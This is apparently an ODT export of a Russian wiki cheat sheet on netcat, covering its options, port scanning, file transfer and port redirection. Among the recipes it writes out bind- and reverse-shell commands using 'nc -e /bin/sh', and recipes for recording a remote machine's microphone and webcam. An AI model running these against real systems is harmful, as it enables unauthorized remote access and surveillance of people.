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s:nc"/><text:bookmark-start text:name="__RefHeading___netcat_1"/><text:bookmark-start text:name="netcat"/>Netcat<text:bookmark-end text:name="__RefHeading___netcat_1"/><text:bookmark-end text:name="netcat"/></text:h>
      <text:p text:style-name="Text_20_body">Netcat - это сетевой инструмент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nc <text:span text:style-name="highlight_re5">-nv</text:span> 192.168.0.178 <text:span text:style-name="highlight_nu0">80</text:span><text:line-break/>$ nc <text:span text:style-name="highlight_re5">-nlvp</text:span> <text:span text:style-name="highlight_nu0">4444</text:span><text:line-break/>$ nc <text:span text:style-name="highlight_re5">-nv</text:span> 192.168.0.178 <text:span text:style-name="highlight_nu0">4444</text:span><text:line-break/>$ nc <text:span text:style-name="highlight_re5">-v</text:span> 127.1.0.1 <text:span text:style-name="highlight_nu0">3306</text:span><text:line-break/>$ <text:span text:style-name="highlight_kw3">echo</text:span> <text:span text:style-name="highlight_st0">"help"</text:span> <text:span text:style-name="highlight_sy0">|</text:span> nc 192.168.1.132 <text:span text:style-name="highlight_nu0">2181</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_First"> -h	Справка; ничего не делается</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -v	Дополнительная диагностика (verbose)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -o выходной_файл	Выводить дампы данных</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -i число	Задержка между отправляемыми данными (в секундах)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -t	Совместимость с Telnet</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -z	Не посылать данные (сканирование портов)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -u	Подключаться по UDP (вместо TCP)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -l	Пассивный режим (прослушивание порта)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -p число	* Локальный номер порта (для -l)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -s host	Использовать заданный локальный («свой») IP-адрес</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -n	Отключить DNS и поиск номеров портов по /etc/services</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -w число	Задать тайм-аут (в секундах)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -q число	Задать время ожидания после EOF на входе (в секундах)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -e исполняемый_файл	! Запустить указанную программу для обмена данных с сетью (вместо стандартных ввода и вывода)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> -с команда	! То же, в виде команды для /bin/sh</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> -k	Продолжить слушать другие соединения после того как текущее соединение было завершено.</text:p>
        </text:list-item>
      </text:list>
      <text:line-break/>
      <text:p text:style-name="Text_20_body">Утилита netcat по сути не делает ничего, кроме копирования данных в сетевой порт и из него, но при этом с ее помощью можно:</text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___прослушивание_порта_2"/><text:bookmark-start text:name="прослушивание_порта"/>Прослушивание порта<text:bookmark-end text:name="__RefHeading___прослушивание_порта_2"/><text:bookmark-end text:name="прослушивание_порт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c <text:span text:style-name="highlight_re5">-nlv</text:span> <text:span text:style-name="highlight_nu0">8080</text:span> <text:span text:style-name="highlight_sy0">&gt;</text:span> <text:span text:style-name="highlight_sy0">/</text:span>tmp<text:span text:style-name="highlight_sy0">/</text:span>log.txt <text:span text:style-name="highlight_sy0">&amp;</text:span><text:line-break/><text:span text:style-name="highlight_kw3">echo</text:span> <text:span text:style-name="highlight_re5">-n</text:span> <text:span text:style-name="highlight_st0">"GET / HTTP/1.0<text:span text:style-name="highlight_es1">\r</text:span><text:span text:style-name="highlight_es1">\n</text:span><text:span text:style-name="highlight_es1">\r</text:span><text:span text:style-name="highlight_es1">\n</text:span>"</text:span> <text:span text:style-name="highlight_sy0">|</text:span> nc 127.0.0.1 <text:span text:style-name="highlight_nu0">8080</text:span><text:line-break/><text:span text:style-name="highlight_kw2">cat</text:span> <text:span text:style-name="highlight_sy0">/</text:span>tmp<text:span text:style-name="highlight_sy0">/</text:span>log.txt</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___сканировать_порты_3"/><text:bookmark-start text:name="сканировать_порты"/>Сканировать порты<text:bookmark-end text:name="__RefHeading___сканировать_порты_3"/><text:bookmark-end text:name="сканировать_порты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nc <text:span text:style-name="highlight_re5">-vz</text:span> 192.168.1.132 <text:span text:style-name="highlight_nu0">1</text:span>-<text:span text:style-name="highlight_nu0">1000</text:span>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succeeded <text:span text:style-name="highlight_re5">--color</text:span><text:line-break/>$ nc <text:span text:style-name="highlight_re5">-vzu</text:span> 192.168.1.132 <text:span text:style-name="highlight_nu0">1</text:span>-<text:span text:style-name="highlight_nu0">1000</text:span>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succeeded <text:span text:style-name="highlight_re5">--color</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___передавать_файлы_4"/><text:bookmark-start text:name="передавать_файлы"/>Передавать файлы<text:bookmark-end text:name="__RefHeading___передавать_файлы_4"/><text:bookmark-end text:name="передавать_файлы"/></text:h>
      <text:p text:style-name="Text_20_body">(первую команду выполняем на принимающей машине, вторую - на передающей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$ nc <text:span text:style-name="highlight_re5">-l</text:span> <text:span text:style-name="highlight_nu0">31334</text:span> <text:span text:style-name="highlight_sy0">&gt;</text:span> filename<text:line-break/><text:s text:c="2"/>$ nc 172.16.69.143 <text:span text:style-name="highlight_nu0">31334</text:span> <text:span text:style-name="highlight_sy0">&lt;</text:span> filename</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___удаленно_читать_логи_5"/><text:bookmark-start text:name="удаленно_читать_логи"/>Удаленно читать логи<text:bookmark-end text:name="__RefHeading___удаленно_читать_логи_5"/><text:bookmark-end text:name="удаленно_читать_логи"/></text:h>
      <text:p text:style-name="Text_20_body">(первая - сервер, вторая - клиент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$ nc <text:span text:style-name="highlight_re5">-f</text:span> <text:span text:style-name="highlight_sy0">/</text:span>var<text:span text:style-name="highlight_sy0">/</text:span>log<text:span text:style-name="highlight_sy0">/</text:span>messages <text:span text:style-name="highlight_sy0">|</text:span> nc <text:span text:style-name="highlight_re5">-l</text:span> <text:span text:style-name="highlight_nu0">31334</text:span><text:line-break/><text:s text:c="2"/>$ nc 172.16.69.143 <text:span text:style-name="highlight_nu0">31334</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___использовать_вместо_telnet_6"/><text:bookmark-start text:name="использовать_вместо_telnet"/>Использовать вместо telnet<text:bookmark-end text:name="__RefHeading___использовать_вместо_telnet_6"/><text:bookmark-end text:name="использовать_вместо_telnet"/></text:h>
      <text:p text:style-name="Text_20_body">(первая - telnet-сервер, вторая - клиент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$ nc <text:span text:style-name="highlight_re5">-l</text:span> <text:span text:style-name="highlight_re5">-p</text:span> <text:span text:style-name="highlight_nu0">31334</text:span> <text:span text:style-name="highlight_re5">-e</text:span> <text:span text:style-name="highlight_sy0">/</text:span>bin<text:span text:style-name="highlight_sy0">/</text:span><text:span text:style-name="highlight_kw2">sh</text:span><text:line-break/><text:s text:c="2"/>$ nc 172.16.69.143 <text:span text:style-name="highlight_nu0">31334</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___сканировать_на_открытые_порты_7"/><text:bookmark-start text:name="сканировать_на_открытые_порты"/>Сканировать на открытые порты<text:bookmark-end text:name="__RefHeading___сканировать_на_открытые_порты_7"/><text:bookmark-end text:name="сканировать_на_открытые_порты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$ nc <text:span text:style-name="highlight_re5">-z</text:span> execbit.ru <text:span text:style-name="highlight_nu0">1</text:span>-<text:span text:style-name="highlight_nu0">1024</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___осуществлять_фингерпринт_сервисов_на_основе_баннеров_8"/><text:bookmark-start text:name="осуществлять_фингерпринт_сервисов_на_основе_баннеров"/>Осуществлять фингерпринт сервисов на основе баннеров<text:bookmark-end text:name="__RefHeading___осуществлять_фингерпринт_сервисов_на_основе_баннеров_8"/><text:bookmark-end text:name="осуществлять_фингерпринт_сервисов_на_основе_баннеров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$ <text:span text:style-name="highlight_kw3">echo</text:span> <text:span text:style-name="highlight_st0">"QUIT"</text:span> <text:span text:style-name="highlight_sy0">|</text:span> nc execbit.ru <text:span text:style-name="highlight_nu0">1</text:span>-<text:span text:style-name="highlight_nu0">1024</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___организовывать_обратный_шелл_9"/><text:bookmark-start text:name="организовывать_обратный_шелл"/>Организовывать обратный шелл<text:bookmark-end text:name="__RefHeading___организовывать_обратный_шелл_9"/><text:bookmark-end text:name="организовывать_обратный_шелл"/></text:h>
      <text:p text:style-name="Text_20_body">(первая - клиент, вторая - сервер, однако шелл откроется от сервера к клиенту)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$ nc <text:span text:style-name="highlight_re5">-e</text:span> <text:span text:style-name="highlight_sy0">/</text:span>bin<text:span text:style-name="highlight_sy0">/</text:span><text:span text:style-name="highlight_kw2">sh</text:span> 172.16.69.143 <text:span text:style-name="highlight_nu0">31334</text:span><text:line-break/><text:s text:c="2"/>$ nc <text:span text:style-name="highlight_re5">-l</text:span> <text:span text:style-name="highlight_re5">-p</text:span> <text:span text:style-name="highlight_nu0">31334</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___делать_микрофонную_запись_с_удаленной_машины_10"/><text:bookmark-start text:name="делать_микрофонную_запись_с_удаленной_машины"/>Делать микрофонную запись с удаленной машины<text:bookmark-end text:name="__RefHeading___делать_микрофонную_запись_с_удаленной_машины_10"/><text:bookmark-end text:name="делать_микрофонную_запись_с_удаленной_машины"/></text:h>
      <text:p text:style-name="Text_20_body">(сервер, клиент)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2"/>$ <text:span text:style-name="highlight_kw2">arecord</text:span> <text:span text:style-name="highlight_re5">-f</text:span> dat <text:span text:style-name="highlight_re5">-t</text:span> raw <text:span text:style-name="highlight_sy0">|</text:span> nc <text:span text:style-name="highlight_re5">-l</text:span> <text:span text:style-name="highlight_nu0">31337</text:span><text:line-break/><text:s text:c="2"/>$ nc 172.16.69.143 <text:span text:style-name="highlight_nu0">31337</text:span> <text:span text:style-name="highlight_sy0">|</text:span> oggenc - <text:span text:style-name="highlight_re5">-r</text:span> <text:span text:style-name="highlight_re5">-o</text:span> nc.ogg</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___получать_снимки_с_web-камеры_удаленной_машины_11"/><text:bookmark-start text:name="получать_снимки_с_web-камеры_удаленной_машины"/>Получать снимки с web-камеры удаленной машины<text:bookmark-end text:name="__RefHeading___получать_снимки_с_web-камеры_удаленной_машины_11"/><text:bookmark-end text:name="получать_снимки_с_web-камеры_удаленной_машины"/></text:h>
      <text:p text:style-name="Text_20_body">(сервер, клиент)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 text:c="2"/>$ <text:span text:style-name="highlight_kw1">while</text:span> <text:span text:style-name="highlight_br0">[</text:span> <text:span text:style-name="highlight_nu0">1</text:span> <text:span text:style-name="highlight_br0">]</text:span>; <text:span text:style-name="highlight_kw1">do</text:span> streamer <text:span text:style-name="highlight_re5">-o</text:span> <text:span text:style-name="highlight_sy0">/</text:span>tmp<text:span text:style-name="highlight_sy0">/</text:span>photo.jpeg; nc <text:span text:style-name="highlight_re5">-l</text:span> <text:span text:style-name="highlight_nu0">31337</text:span> <text:span text:style-name="highlight_sy0">&lt;</text:span> <text:span text:style-name="highlight_sy0">/</text:span>tmp<text:span text:style-name="highlight_sy0">/</text:span>photo.jpeg; <text:span text:style-name="highlight_kw1">done</text:span><text:line-break/><text:s text:c="2"/>$ nc localhost <text:span text:style-name="highlight_nu0">31337</text:span> <text:span text:style-name="highlight_sy0">&gt;</text:span> photo.jpeg</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="Text_20_body">Однако, важно понимать, что существует несколько версий netcat, поведение которых может отличаться. Экземпляр, поставляемый с дистрибутивами Linux, - это оригинал, доживший до наших дней. Все пять приведенных примеров он отработает без проблем. Версия под названием GNU Netcat не поддерживает опции -e, поэтому второй и пятый примеры она не воспримет.</text:p>
      <text:p text:style-name="Text_20_body">Особого внимания заслуживает netcat, распространяемый вместе с BSD-системами, опция -e в нем есть, но предназначена она для шифрования входящего и исходящего трафика методом IPSec ESP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 text:c="2"/>$ nc <text:span text:style-name="highlight_re5">-e</text:span> <text:span text:style-name="highlight_st_h">'in ipsec esp/transport//require'</text:span> <text:span text:style-name="highlight_re5">-e</text:span> <text:span text:style-name="highlight_st_h">'out ipsec esp/transport//require'</text:span> \<text:line-break/><text:s text:c="2"/>172.16.69.143 <text:span text:style-name="highlight_nu0">31334</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="Text_20_body">Кроме того, BSD Netcat способен подключаться к удаленной машине через прокси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2"/>$ nc -x172.16.64.1:<text:span text:style-name="highlight_nu0">8080</text:span> <text:span text:style-name="highlight_re5">-Xconnect</text:span> 172.16.69.143 <text:span text:style-name="highlight_nu0">31334</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="Text_20_body">В этом примере прокси находится по адресу 172.16.64.1:8080, а флаг -Xconnect говорит о том, что он работает с протоколом HTTP. Также поддерживаются SOCKS версий 4 и 5, но о них следует информировать netcat через флаг -X4 или -X5.</text:p>
      <text:p text:style-name="Text_20_body">Сам netcat легко использовать в качестве прокси или редиректора портов, но в этом случае его лучше связать с демоном inetd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 text:c="2"/>$ <text:span text:style-name="highlight_kw3">echo</text:span> <text:span text:style-name="highlight_st_h">'redirect-2525-to-25 2525/tcp'</text:span> <text:span text:style-name="highlight_sy0">&gt;&gt;</text:span> <text:span text:style-name="highlight_sy0">/</text:span>etc<text:span text:style-name="highlight_sy0">/</text:span>services<text:line-break/><text:s text:c="2"/>$ <text:span text:style-name="highlight_kw3">echo</text:span> <text:span text:style-name="highlight_st_h">'redirect-2525-to-25 stream tcp nowait nobody /usr/bin/nc nc -w 2 127.0.0.1 25'</text:span> \<text:line-break/><text:s text:c="2"/><text:span text:style-name="highlight_sy0">&gt;&gt;</text:span> <text:span text:style-name="highlight_sy0">/</text:span>etc<text:span text:style-name="highlight_sy0">/</text:span>inetd.conf<text:line-break/><text:s text:c="2"/>$ <text:span text:style-name="highlight_kw2">killall</text:span> <text:span text:style-name="highlight_re5">-HUP</text:span> inetd</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="Text_20_body">Теперь весь трафик, пришедший на порт 2525, будет перенаправляться на стандартный 25-й SMTP-порт. Таким же образом мы можем завернуть трафик с любого порта на другой порт/машину, просто видоизменив первые две команды.</text:p>
      <text:p text:style-name="Text_20_body">Кстати, пользователи дистрибутивов Linux могут вообще не заморачиваться с netcat: демон xinetd, ставший стандартом в Linux-системах, сам умеет перенаправлять сетевой трафик:</text:p>
      <text:p text:style-name="Text_20_body">cat /etc/xinetd/redirect</text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:s text:c="2"/><text:line-break/><text:s text:c="2"/>service redirect-2525-to-25<text:line-break/><text:s text:c="2"/>{<text:line-break/><text:s text:c="4"/>disable = no<text:line-break/><text:s text:c="4"/>type = UNLISTED<text:line-break/><text:s text:c="4"/>socket_type = stream<text:line-break/><text:s text:c="4"/>protocol = tcp<text:line-break/><text:s text:c="4"/>wait = no<text:line-break/><text:s text:c="4"/>port = 2525<text:line-break/><text:s text:c="4"/>redirect = 127.0.0.1 25<text:line-break/><text:s text:c="4"/>user = nobody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52:31</meta:creation-date>
    <dc:creator>Generated</dc:creator>
    <dc:date>2026-07-18T16::52:31</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:editing-duration>PT0S</meta:editing-duration>
    <dc:title>networks:nc</dc:title>
  </office:meta>
</office:document-meta>
</file>